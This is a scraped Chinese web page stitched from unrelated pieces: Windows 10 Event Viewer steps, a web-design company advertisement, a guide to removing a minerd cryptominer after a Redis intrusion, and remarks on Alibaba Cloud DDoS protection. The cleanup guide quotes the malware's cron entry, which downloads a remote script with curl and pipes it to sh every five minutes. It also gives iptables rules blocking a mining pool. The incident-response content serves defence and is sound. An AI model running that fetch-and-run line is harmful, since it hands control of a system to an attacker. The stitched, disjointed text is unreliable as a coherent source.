方法如下:1、在Win10系統(tǒng)里右鍵開始菜單,選擇事件查看器,如下圖所示。2、在事件查看器里點(diǎn)擊Windows日志,如下圖所示。3、在這里可以按分類點(diǎn)擊查看日志,在日志查看器的左邊有應(yīng)用程序日志,安全日志,設(shè)置日志,系統(tǒng)日志等等,系統(tǒng)錯(cuò)誤一般都在系統(tǒng)選項(xiàng)里,應(yīng)用程序錯(cuò)誤在應(yīng)用程序選項(xiàng)里,如下圖所示。4、可以選擇某一條系統(tǒng)日志點(diǎn)擊右鍵,選擇事件熟悉查看更詳細(xì)的內(nèi)容,如下圖所示。5、在打開的事件屬性里,可以查看到詳細(xì)的信息,點(diǎn)擊復(fù)制可以把系統(tǒng)日志拷貝出去,如下圖所示。
我們提供的服務(wù)有:網(wǎng)站設(shè)計(jì)、網(wǎng)站制作、微信公眾號(hào)開發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、和政ssl等。為上千余家企事業(yè)單位解決了網(wǎng)站和推廣的問(wèn)題。提供周到的售前咨詢和貼心的售后服務(wù),是有科學(xué)管理、有技術(shù)的和政網(wǎng)站制作公司
1. 關(guān)閉訪問(wèn)挖礦服務(wù)器的訪問(wèn)
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉執(zhí)行權(quán)限, 在沒(méi)有找到根源前,千萬(wàn)不要?jiǎng)h除 minerd,因?yàn)閯h除了,過(guò)一回會(huì)自動(dòng)有生成一個(gè)。
3. pkill minerd ,殺掉進(jìn)程
4. service stop crond 或者 crontab -r 刪除所有的執(zhí)行計(jì)劃
5. 執(zhí)行top,查看了一會(huì),沒(méi)有再發(fā)現(xiàn)minerd 進(jìn)程了。
6.檢查/var/spool/cron/目錄下發(fā)現(xiàn)有個(gè)root用戶的定時(shí)器文件。
下載腳本的語(yǔ)句:
*/5 * * * * curl -fsSL | sh
病毒文件內(nèi)容如下,感興趣的可以研究下:
? View Code
解決minerd并不是最終的目的,主要是要查找問(wèn)題根源,我的服務(wù)器問(wèn)題出在了redis服務(wù)了,黑客利用了redis的一個(gè)漏洞獲得了服務(wù)器的訪問(wèn)權(quán)限,然后就注入了病毒,下面是解決辦法和清除工作:
1. 修復(fù) redis 的后門,
配置bind選項(xiàng), 限定可以連接Redis服務(wù)器的IP, 并修改redis的默認(rèn)端口6379.
配置AUTH, 設(shè)置密碼, 密碼會(huì)以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權(quán)訪問(wèn), 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會(huì)開發(fā)”real user”,區(qū)分普通用戶和admin權(quán)限,普通用戶將會(huì)被禁止運(yùn)行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認(rèn)識(shí)的賬號(hào)
3. 查看你的用戶列表,是不是有你不認(rèn)識(shí)的用戶添加進(jìn)來(lái)。 如果有就刪除掉.
服務(wù)器被攻擊了,攻擊阿里云報(bào)告,分析如下。
1、使用阿里云的服務(wù)器用戶多,阿里云的主機(jī)在國(guó)內(nèi)市場(chǎng)占有率確實(shí)高,有4成用戶都在使用阿里云服務(wù)器。
2、阿里云主機(jī)免費(fèi)防御小,阿里云國(guó)內(nèi)服務(wù)器默認(rèn)免費(fèi)防御5G,香港的更小,只有2G,甚至不提供DDOS防御,這點(diǎn)防御力在攻擊方面前成本可以忽略不計(jì)。
3、阿里云不能換IP的特點(diǎn)一直傳承到現(xiàn)在,還是沒(méi)解決,只有購(gòu)買DDOS高防后才給換一次。